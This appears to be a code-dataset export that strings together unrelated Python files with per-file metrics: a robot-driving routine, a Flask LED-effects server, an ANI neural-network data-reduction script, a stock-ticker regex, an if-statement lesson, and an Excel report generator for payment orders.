    :param loops:    number of segments.
    :param duration: seconds to pivot after each segment.
        FIX: the original accepted this parameter but pivoted for a
        hard-coded 5 seconds; it is now honored.
    """
    robot = rosebot.RoseBot()
    while True:
        if robot.sensor_system.color_sensor.get_color_as_name() == 'Blue' or robot.sensor_system.color_sensor.get_color() == 2:
            robot.drive_system.go_until_distance_is_within(2, 0, 25)
            robot.arm_and_claw.raise_arm()
            for _ in range(loops):  # was "k": index never used
                robot.drive_system.go_straight_for_inches_using_encoder(length, speed)
                robot.drive_system.left_motor.turn_on(speed)
                robot.drive_system.right_motor.turn_on(-1 * speed)
                time.sleep(duration)  # FIX: replaces busy-wait AND the ignored parameter
                robot.drive_system.right_motor.turn_off()
                robot.drive_system.left_motor.turn_off()
            break
| 39.481481
| 127
| 0.599124
| 790
| 6,396
| 4.541772
| 0.140506
| 0.097547
| 0.156076
| 0.070234
| 0.878763
| 0.878763
| 0.872352
| 0.853122
| 0.801282
| 0.746934
| 0
| 0.021141
| 0.312226
| 6,396
| 161
| 128
| 39.726708
| 0.794499
| 0.066448
| 0
| 0.818182
| 0
| 0
| 0.002018
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057851
| false
| 0
| 0.016529
| 0
| 0.07438
| 0.041322
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
51c2d0a71d3bc4b147839ea7ea39d280618c757f
| 2,284
|
py
|
Python
|
Iris>LightServer/test.py
|
rrbutani/Iris
|
e3a61530a763387e99fd3107a90fdb3d160f6ead
|
[
"Unlicense"
] | null | null | null |
Iris>LightServer/test.py
|
rrbutani/Iris
|
e3a61530a763387e99fd3107a90fdb3d160f6ead
|
[
"Unlicense"
] | 1
|
2021-02-08T20:15:49.000Z
|
2021-02-08T20:15:49.000Z
|
Iris>LightServer/test.py
|
rrbutani/Iris
|
e3a61530a763387e99fd3107a90fdb3d160f6ead
|
[
"Unlicense"
] | 1
|
2016-05-23T17:09:28.000Z
|
2016-05-23T17:09:28.000Z
|
from flask import Flask, request
import effects
import lights
import json
# Python 2 startup: log the strip size, paint every pixel solid red as a
# power-on indicator, then build the Flask app.
print lights.strip.numPixels()
# (removed: a very long commented-out json.loads smoke test of a 123-element literal)
for i in range(0, lights.strip.numPixels()):
    lights.strip.setPixelColor(i, 0xFF0000)  # 0xRRGGBB -> red
lights.strip.show()
app = Flask(__name__)
#effects.raw.info()
@app.route('/')
def hello_world():
    """Root endpoint: always answers with a fixed greeting."""
    greeting = 'Hello World!'
    return greeting
@app.route('/api/set/<effect_name>')
def effect_handler(effect_name):
    """Run the effect named in the URL, passing the query args through.

    Returns a short confirmation string on success.  FIX: when no such
    effect exists the original fell through and returned None, which
    makes Flask raise a 500; the commented-out fallback is restored.
    """
    effect = getattr(effects, effect_name, None)  # single lookup instead of hasattr+getattr
    if effect is not None:
        effect.info()
        effect.run(lights.strip, request.args)
        return effect_name + 'idiot'
    return effect_name + ' - no luck'
# else:
# return effect_name + ' - no luck'
if __name__ == '__main__':
    # Listen on all interfaces; binding port 80 generally requires root.
    app.run(host='0.0.0.0', port=80)
| 57.1
| 1,211
| 0.765762
| 267
| 2,284
| 6.47191
| 0.191011
| 1.287037
| 1.902778
| 2.5
| 0.663194
| 0.663194
| 0.663194
| 0.663194
| 0.663194
| 0.663194
| 0
| 0.563083
| 0.108144
| 2,284
| 39
| 1,212
| 58.564103
| 0.285223
| 0.72373
| 0
| 0
| 0
| 0
| 0.088853
| 0.035541
| 0
| 0
| 0.012924
| 0
| 0
| 0
| null | null | 0
| 0.2
| null | null | 0.05
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
51e9ed7cd6fdaded1114be0c4addf10bc513a6b3
| 9,590
|
py
|
Python
|
activelearning/datareduction/ani_data_reduction.py
|
plin1112/ANI-Tools
|
76280c918fc79fee8c266b8bc9ab57f86104ec99
|
[
"MIT"
] | 8
|
2018-10-30T16:48:44.000Z
|
2021-03-08T01:44:41.000Z
|
activelearning/datareduction/ani_data_reduction.py
|
plin1112/ANI-Tools
|
76280c918fc79fee8c266b8bc9ab57f86104ec99
|
[
"MIT"
] | null | null | null |
activelearning/datareduction/ani_data_reduction.py
|
plin1112/ANI-Tools
|
76280c918fc79fee8c266b8bc9ab57f86104ec99
|
[
"MIT"
] | 5
|
2018-04-05T15:51:12.000Z
|
2019-05-23T21:38:31.000Z
|
import pyanitrainer as atr
import os
# Network 1 Files
# Working directory holding trained-network artifacts and outputs.
wkdir = '/home/jujuman/Research/DataReductionMethods/model_9.0.5_reduce/train/'
cnstf = 'rHCNO-4.6A_16-3.1A_a4-8.params'  # network constants/params file
saenf = 'sae_6-31gd.dat'                  # single-atom-energy file
nfdir = 'networks/'                       # network store subdirectory under wkdir
opt = 'active_output.opt'                 # active-learning output options file
# Data Dir
datadir = '/home/jujuman/Research/DataReductionMethods/model_9.0.5_reduce/cache/'
testdata = datadir + 'testset/testset.h5'   # held-out test set (HDF5)
trainh5 = wkdir + 'ani_red9.0.5_ALfull.h5'  # destination for the reduced training set
# Test data
# Candidate HDF5 files fed into the active-learning data reducer below.
test_files = ['/home/jujuman/Research/GDB_Dimer/dimers1_fix.h5',
'/home/jujuman/Research/GDB_Dimer/dimers2_fix.h5',
'/home/jujuman/Research/GDB_Dimer/dimers3_fix.h5',
'/home/jujuman/Research/GDB_Dimer/dimers4_fix.h5',
'/home/jujuman/Research/GDB_Dimer/dimers5_fix.h5',
'/home/jujuman/Research/GDB_Dimer/dimers6_fix.h5',
'/home/jujuman/Research/GDB_Dimer/dimer_gen_7/dimers7.h5',
'/home/jujuman/Research/ReactionGeneration/reactiondata/DA_rxn_1/DA_rxn_1.h5',
'/home/jujuman/Research/ReactionGeneration/reactiondata/DA_rxn_1/DA_rxn_1_2.h5',
'/home/jujuman/Research/ReactionGeneration/reactiondata/comb_rxn_1/comb_rxn_1.h5',
'/home/jujuman/Research/ReactionGeneration/reactiondata/comb_rxn_1/comb_rxn_1_2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb09_1/ani_al-9.0.5.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb09_1/ani_al-9.0.4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb09_1/ani_al-9.0.3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb09_1/ani_al-9.0.2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb09_1/ani_al-9.0.1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_3/gdb_r06_comb08_03_4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_3/gdb_r06_comb08_03_3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_3/gdb_r06_comb08_03_2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_3/gdb_r06_comb08_03_1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_2/gdb_r06_comb08_02_4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_2/gdb_r06_comb08_02_3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_2/gdb_r06_comb08_02_2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_2/gdb_r06_comb08_02_1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_1/gdb_r06_comb08_5.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_1/gdb_r06_comb08_4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_1/gdb_r06_comb08_3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_1/gdb_r06_comb08_2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_comb_resample/gdb_r06_comb08_1/gdb_r06_comb08_1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_mdal_resample/mdal.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/h2o_cluster/h2o_nms_clusters.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-05_red03-05/confs_cv_gdb01-05_rs1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-05_red03-05/confs_cv_gdb01-05_rs2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-05_red03-05/confs_cv_gdb01-05_rs3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-05_red03-05/confs_cv_gdb01-05_rs4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-06/confs_cv_gdb01-06_rs1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-06/confs_cv_gdb01-06_rs2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-06/confs_cv_gdb01-06_rs3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-06/confs_cv_gdb01-06_rs4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-07/confs_cv_gdb01-07_rs1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-07/confs_cv_gdb01-07_rs2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-07/confs_cv_gdb01-07_rs3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-07/confs_cv_gdb01-07_rs4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-08/confs_cv_gdb01-08_rs1.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-08/confs_cv_gdb01-08_rs2.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-08/confs_cv_gdb01-08_rs3.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/dnnts_nms_resample/confs_cv_gdb01-06_red03-08/confs_cv_gdb01-08_rs4.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/gdb11_h5/gdb11_S01_06r.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/gdb11_h5/gdb11_S02_06r.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/gdb11_h5/gdb11_S03_06r.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/gdb11_h5/gdb11_S04_06r.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/gdb11_h5/gdb11_S05_06r.h5',
'/home/jujuman/Research/GDB-11-AL-wB97x631gd/gdb11_h5/gdb11_S06_06r.h5',
]
#---- Parameters ----
GPU = 0        # GPU ID
LR = 0.001     # Initial learning rate
LA = 0.25      # LR annealing
CV = 1.0e-6    # LR converg
ST = 100       # ???? (unexplained in the original -- TODO confirm meaning)
M = 0.34       # Max error per atom in kcal/mol
P = 0.01       # Percent to keep
ps = 20        # Print step
Naev = 384     # passed to ActiveANI below; presumably the AEV length -- TODO confirm
sinet = False
#--------------------
# Training varibles
# Trainer configuration passed to atr.anitrainer (string values expected
# by the underlying tool).
d = dict({'wkdir' : wkdir,
          'sflparamsfile' : cnstf,
          'ntwkStoreDir' : wkdir+'networks/',
          'atomEnergyFile': saenf,
          'datadir' : datadir,
          'tbtchsz' : '1024',
          'vbtchsz' : '1024',
          'gpuid' : str(GPU),
          'ntwshr' : '0',
          'nkde' : '2',
          'force' : '0',
          'fmult' : '0.01',
          'runtype' : 'ANNP_CREATE_HDNN_AND_TRAIN',
          'adptlrn' : 'OFF',
          'moment' : 'ADAM',})
# Network architecture: three hidden layers (128, 128, 64) and a
# single-node output layer.
l1 = dict({'nodes' : '128',
           'activation' : '5',
           'maxnorm' : '1',
           'norm' : '3.0',
           'btchnorm' : '0',})
l2 = dict({'nodes' : '128',
           'activation' : '5',
           'maxnorm' : '1',
           'norm' : '3.0',
           'btchnorm' : '0',})
l3 = dict({'nodes' : '64',
           'activation' : '5',
           'maxnorm' : '1',
           'norm' : '3.0',
           'btchnorm' : '0',})
l4 = dict({'nodes' : '1',
           'activation' : '6',})
layers = [l1, l2, l3, l4,]
# Active-learning driver: repeatedly train, test, and fold the worst
# predictions back into the training set until fewer than 5% of the
# candidate points are classified "bad".
aani = atr.ActiveANI(test_files, wkdir+saenf, wkdir+opt, datadir, testdata, Naev)
aani.init_dataset(P)
inc = 0  # iteration counter; also grows the keep fraction below
while aani.get_percent_bad() > 5.0:
    # Remove existing network so each round trains from scratch.
    network_files = os.listdir(wkdir + 'networks/')
    for f in network_files:
        os.remove(wkdir + 'networks/' + f)
    # Setup trainer
    tr = atr.anitrainer(d,layers)
    # Train network
    tr.train_network(LR, LA, CV, ST, ps)
    # Write the learning curve
    tr.write_learning_curve(wkdir+'learning_curve_'+str(inc)+'.dat')
    # Test network: compute_test returns (energy RMSE, force RMSE).
    ant = atr.anitester(wkdir+cnstf, wkdir+saenf, wkdir+nfdir, GPU, sinet)
    test_rmse_e, test_rmse_f = ant.compute_test(testdata)
    print('Test E RMSE:', "{:.3f}".format(test_rmse_e), 'kcal/mol')
    print('Test F RMSE:', "{:.3f}".format(test_rmse_f), 'kcal/mol/A')
    # Check for and add bad data; keep fraction grows by 0.01 per round.
    aani.add_bad_data(wkdir+cnstf, wkdir+saenf, wkdir+nfdir, GPU, sinet, P=0.01 + inc * 0.01, M=M)
    inc = inc + 1
# Converged: fold in all remaining bad data and persist the reduced set.
aani.add_bad_data(wkdir + cnstf, wkdir + saenf, wkdir + nfdir, GPU, sinet, P=1.0, M=M)
aani.store_train_h5(trainh5)
# Final pass: retrain on the reduced set and report/persist diagnostics.
# Remove existing network so the final model trains from scratch.
network_files = os.listdir(wkdir + 'networks/')
for f in network_files:
    os.remove(wkdir + 'networks/' + f)
# Setup trainer
tr = atr.anitrainer(d, layers)
# Train network
tr.train_network(LR, LA, CV, ST, ps)
# Test network.
# FIX: compute_test returns an (energy RMSE, force RMSE) pair -- see the
# loop above -- but the original bound the tuple to a single name and
# passed it to "{:.3f}".format, which raises TypeError.
ant = atr.anitester(wkdir + cnstf, wkdir + saenf, wkdir + nfdir, GPU, sinet)
test_rmse_e, test_rmse_f = ant.compute_test(testdata)
print('Final Test E RMSE:', "{:.3f}".format(test_rmse_e), 'kcal/mol')
print('Final Test F RMSE:', "{:.3f}".format(test_rmse_f), 'kcal/mol/A')
# Persist keep/diff diagnostics; context managers so the handles close
# (the original left both files open).
with open(wkdir + 'keep_info.dat', 'w') as o:
    for k in aani.get_keep_info():
        o.write(str(int(k[1])) + ' : ' + str(k[0]) + '\n')
with open(wkdir + 'diffs.dat', 'w') as f:
    for K in aani.get_diff_kept(wkdir + cnstf, wkdir + saenf, wkdir + nfdir, GPU, sinet, M=M):
        # comma-joined 7-decimal values, one row per kept conformation
        f.write(','.join("{:.7f}".format(k) for k in K) + '\n')
| 51.55914
| 131
| 0.663191
| 1,427
| 9,590
| 4.192011
| 0.155571
| 0.101137
| 0.174691
| 0.182548
| 0.801739
| 0.778168
| 0.778168
| 0.740221
| 0.727516
| 0.703611
| 0
| 0.119841
| 0.189051
| 9,590
| 185
| 132
| 51.837838
| 0.649351
| 0.040667
| 0
| 0.169014
| 0
| 0.239437
| 0.607587
| 0.550796
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014085
| 0
| 0.014085
| 0.021127
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a400ea67456922121b72684564d665fa4da0f1de
| 156
|
py
|
Python
|
src/utils/extractors.py
|
abdellatifLabr/social-media-stocks-tracker
|
b54f1db488d8b26e292ec025d1af7f8d4b5a94da
|
[
"MIT"
] | null | null | null |
src/utils/extractors.py
|
abdellatifLabr/social-media-stocks-tracker
|
b54f1db488d8b26e292ec025d1af7f8d4b5a94da
|
[
"MIT"
] | null | null | null |
src/utils/extractors.py
|
abdellatifLabr/social-media-stocks-tracker
|
b54f1db488d8b26e292ec025d1af7f8d4b5a94da
|
[
"MIT"
] | null | null | null |
import re
def extract_tickers(text, stock_symbol_length, *args, **kwargs):
    """Return all $-prefixed stock tickers of the given symbol length.

    :param text: text to scan.
    :param stock_symbol_length: number of letters after the ``$``;
        accepts an int or a string of digits (the original required a
        string because it concatenated it into the pattern).
    :return: list of matched tickers including the leading ``$``.
    """
    # Raw string avoids the invalid "\S" escape in a plain literal;
    # str() generalizes the length argument backward-compatibly.
    pattern = r'([$][A-Za-z]{' + str(stock_symbol_length) + r'})\S*'
    return re.findall(pattern, text)
| 26
| 78
| 0.653846
| 22
| 156
| 4.409091
| 0.772727
| 0.226804
| 0.350515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128205
| 156
| 5
| 79
| 31.2
| 0.713235
| 0
| 0
| 0
| 0
| 0
| 0.128205
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
32263a3ab6072475de7cd528895f9bbf02dc912b
| 168
|
py
|
Python
|
predavanje3/uvjetna_naredba_if.py
|
Miillky/uvod_u_programiranje
|
209611e38c8fe84c727649df4b868a4278eb77c3
|
[
"MIT"
] | null | null | null |
predavanje3/uvjetna_naredba_if.py
|
Miillky/uvod_u_programiranje
|
209611e38c8fe84c727649df4b868a4278eb77c3
|
[
"MIT"
] | null | null | null |
predavanje3/uvjetna_naredba_if.py
|
Miillky/uvod_u_programiranje
|
209611e38c8fe84c727649df4b868a4278eb77c3
|
[
"MIT"
] | null | null | null |
# Lesson: the if statement -- indented lines run only when the condition
# holds; unindented lines always run.
# NOTE(review): original indentation was lost in extraction; the split
# below (two conditional prints, two unconditional, per block) is
# inferred from the quote-style change between lines -- TODO confirm.
if 5<6:
    print('Linija1')
    print('Linija2')
print("Linija3")
print("Linija4")
# Condition is false here, so the indented prints are skipped.
if 5>6:
    print("Linija1")
    print("Linija2")
print("Linija3")
print("Linija4")
| 15.272727
| 20
| 0.619048
| 22
| 168
| 4.727273
| 0.363636
| 0.057692
| 0.076923
| 0.173077
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.085714
| 0.166667
| 168
| 11
| 21
| 15.272727
| 0.657143
| 0
| 0
| 0.4
| 0
| 0
| 0.331361
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.8
| 1
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
5c6c0fbb192964514a73f3f96708e09288d0f48b
| 21,542
|
py
|
Python
|
hanibal/ans_reporte/crear_informe_orden_pago_excel.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
hanibal/ans_reporte/crear_informe_orden_pago_excel.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
hanibal/ans_reporte/crear_informe_orden_pago_excel.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
import openpyxl
from openpyxl import Workbook
import openpyxl.worksheet
import unicodedata
from copy import deepcopy
from openpyxl.chart import (
Reference,
Series,
BarChart
)
from openpyxl.chart.marker import DataPoint
from openpyxl.drawing.fill import PatternFillProperties, ColorChoice
from openpyxl import Workbook
from openpyxl.styles import PatternFill, Border, Side, Alignment, Protection, Font
from openpyxl.styles.borders import Border, Side
from openpyxl.drawing.image import Image
from datetime import datetime, date, timedelta
import time
import locale
global root
def crear_wb_informe():
    """Create and return a fresh openpyxl workbook for the report."""
    return openpyxl.Workbook()
def unicodeText(text):
    """Best-effort conversion of *text* to unicode; returns it unchanged on failure.

    FIX: two defects in the original -- (1) the success path had no
    ``return``, so a successful conversion returned None; (2)
    ``unicodedata`` has no ``unicode`` attribute, so every call raised
    an uncaught AttributeError.  The function now always returns the
    (possibly converted) text.
    """
    try:
        # NOTE(review): the intent was probably the Python 2 builtin
        # unicode(text, 'utf-8'); unicodedata.unicode does not exist --
        # TODO confirm and substitute a real decode if conversion matters.
        text = unicodedata.unicode(text, 'utf-8')
    except (TypeError, AttributeError):
        pass
    return text
def crea_hoja_info(wb, title, flag):
    """Configure the workbook's active sheet (margins, fit, title) and return it.

    :param wb: workbook whose active sheet is configured.
    :param title: new sheet title.
    :param flag: 0 or 1; both branches apply identical settings (the
        split is kept for compatibility with existing callers).
    :return: the configured worksheet.
    """
    sheet = wb.active
    if flag == 0:
        sheet.page_margins.left = 0.1
        sheet.page_margins.right = 0.1
        sheet.page_margins.top = 0.5
        sheet.page_margins.bottom = 0.5
        # FIX: the original assigned "fitToWidht" (typo), which silently
        # created a bogus attribute instead of configuring page setup.
        sheet.page_setup.fitToWidth = False
    if flag == 1:
        sheet.page_setup.fitToWidth = False
        sheet.page_margins.left = 0.1
        sheet.page_margins.right = 0.1
        sheet.page_margins.top = 0.5
        sheet.page_margins.bottom = 0.5
    sheet.title = title
    return sheet
def crea_hoja_info_pdf(wb, title, flag):
    """Configure the active sheet for PDF-style output and return it.

    Identical behavior to crea_hoja_info; retained as a separate entry
    point because callers distinguish the two.

    :param wb: workbook whose active sheet is configured.
    :param title: new sheet title.
    :param flag: 0 or 1; both branches apply identical settings.
    :return: the configured worksheet.
    """
    sheet = wb.active
    if flag == 0:
        sheet.page_margins.left = 0.1
        sheet.page_margins.right = 0.1
        sheet.page_margins.top = 0.5
        sheet.page_margins.bottom = 0.5
        # FIX: "fitToWidht" typo -- see crea_hoja_info.
        sheet.page_setup.fitToWidth = False
    if flag == 1:
        sheet.page_setup.fitToWidth = False
        sheet.page_margins.left = 0.1
        sheet.page_margins.right = 0.1
        sheet.page_margins.top = 0.5
        sheet.page_margins.bottom = 0.5
    sheet.title = title
    return sheet
def border_tabla(sheet, col, colfin, fil, filfin, styleleft, styletop, styleright, stylebottom):
    """Apply one Border (with the four given side styles) to every cell
    in the rectangle rows fil..filfin, columns col..colfin (inclusive).
    """
    borde = Border(
        left=Side(style=styleleft),
        top=Side(style=styletop),
        right=Side(style=styleright),
        bottom=Side(style=stylebottom),
    )
    # The original bumped colfin by 1 and filfin by 2, then looped to
    # filfin-1; the net effect is simply the inclusive ranges below.
    for fila in range(fil, filfin + 1):
        for columna in range(col, colfin + 1):
            sheet.cell(row=fila, column=columna).border = borde
def columnas_filas(sheet, flag, celda, value):
    """Set a column width (flag == 0) or a row height (flag == 1).

    celda is a column letter for widths, or a row number (str or int)
    for heights; value is the new dimension.
    """
    if flag == 0:
        sheet.column_dimensions[celda].width = value
    elif flag == 1:
        sheet.row_dimensions[int(celda)].height = value
def poner_border(sheet, fil, col, styleleft, styletop, styleright, stylebottom):
    """Apply a Border with the four given side styles to the single cell
    at row *fil*, column *col*.
    """
    lados = Border(
        left=Side(style=styleleft),
        top=Side(style=styletop),
        right=Side(style=styleright),
        bottom=Side(style=stylebottom),
    )
    sheet.cell(row=fil, column=col).border = lados
def Informe(sheet, dic, lista_alumnos, cant_alumno, filtro, filtro1):
    """Render the 'Listado de Cheques y Ordenes de Pago' report into *sheet*.

    sheet: openpyxl worksheet to fill.
    dic: header data; keys read here: 'usuario_id', 'company_id',
        'fecha_corte', 'fecha_desde', 'fecha_hasta'.
    lista_alumnos: detail rows; keys read: 'fecha_emision', 'egreso',
        'cheque', 'beneficiario', 'observacion', 'valor'.
    cant_alumno: not used by this function (kept for caller compatibility).
    filtro: payment-methods label, or 0 meaning "all".
    filtro1: payment-states label, or 0 meaning "all".
    """
    # Column widths A..I.
    columnas_filas(sheet, 0, 'A', 10.00)
    columnas_filas(sheet, 0, 'B', 5.00)
    columnas_filas(sheet, 0, 'C', 10.00)
    columnas_filas(sheet, 0, 'D', 7.00)
    columnas_filas(sheet, 0, 'E', 12.00)
    columnas_filas(sheet, 0, 'F', 10.00)
    columnas_filas(sheet, 0, 'G', 10.00)
    columnas_filas(sheet, 0, 'H', 7.00)
    columnas_filas(sheet, 0, 'I', 10.00)
    alignment_title = Alignment(horizontal='center', vertical='center')
    fuente = Font(bold=False, size=6, name='arial')   # body text
    fuente3 = Font(bold=True, size=8, name='arial')   # report title
    fuente2 = Font(bold=True, size=6, name='arial')   # labels / headers
    # NOTE(review): most of these counters are never read below.
    fila = 3
    fila1 = 2
    acum=1
    cont=0
    col=2
    col1=4
    fil=4
    coli=2
    colf=2
    # Report title (A2:I2).
    sheet.merge_cells('A2:I2')
    sheet['A2'].alignment = alignment_title.copy(wrapText=True,horizontal='center', vertical='top')
    sheet['A2'].font = fuente3
    sheet['A2']= 'Listado de Cheques y Ordenes de Pago'
    # User label/value (H1/I1).
    sheet['H1'].alignment = alignment_title.copy(wrapText=True,horizontal='right', vertical='top')
    sheet['H1'].font = fuente2
    sheet['H1']= 'Usuario'
    usuario_id=str(dic['usuario_id'].encode('utf-8'))
    sheet['I1'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['I1'].font = fuente
    sheet['I1']= str(dic['usuario_id'].encode('utf-8'))
    # Company (A1, B1:C1).
    sheet['A1'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['A1'].font = fuente2
    sheet['A1']= 'Compañia'
    sheet.merge_cells('B1:C1')
    sheet['B1'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['B1'].font = fuente
    sheet['B1']= str(dic['company_id'].encode('utf-8'))
    # Cut-off date (A4, B4:C4).
    sheet['A4'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['A4'].font = fuente2
    sheet['A4']= 'Fecha Emisión:'
    #fecha_actual = datetime.strftime(datetime.now(), '%d-%m-%Y %H:%M:%S')
    fecha_actual = dic['fecha_corte']
    sheet.merge_cells('B4:C4')
    sheet['B4'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['B4'].font = fuente
    sheet['B4']= fecha_actual
    # Payment-method filter (A5, B5:E5); 0 means "all".
    sheet['A5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['A5'].font = fuente2
    sheet['A5']= 'Metodos de Pagos:'
    sheet.merge_cells('B5:E5')
    sheet['B5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['B5'].font = fuente
    if filtro==0:
        sheet['B5']= "Todos los metodos de pagos"
    else:
        sheet['B5']= filtro
    # Payment-state filter (F5, G5); 0 means "all".
    sheet['F5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['F5'].font = fuente2
    sheet['F5']= 'Estados de Pagos:'
    sheet.merge_cells('G5:G5')
    sheet['G5'].alignment = alignment_title.copy(wrapText=True,horizontal='left', vertical='top')
    sheet['G5'].font = fuente
    if filtro1==0:
        sheet['G5']= "Todos"
    else:
        sheet['G5']= filtro1
    # Medium border around the header box (rows 1-3, columns A-I).
    poner_border(sheet,1,1,'medium','medium','none','none')
    poner_border(sheet,1,2,'none','medium','none','none')
    poner_border(sheet,1,3,'none','medium','none','none')
    poner_border(sheet,1,4,'none','medium','none','none')
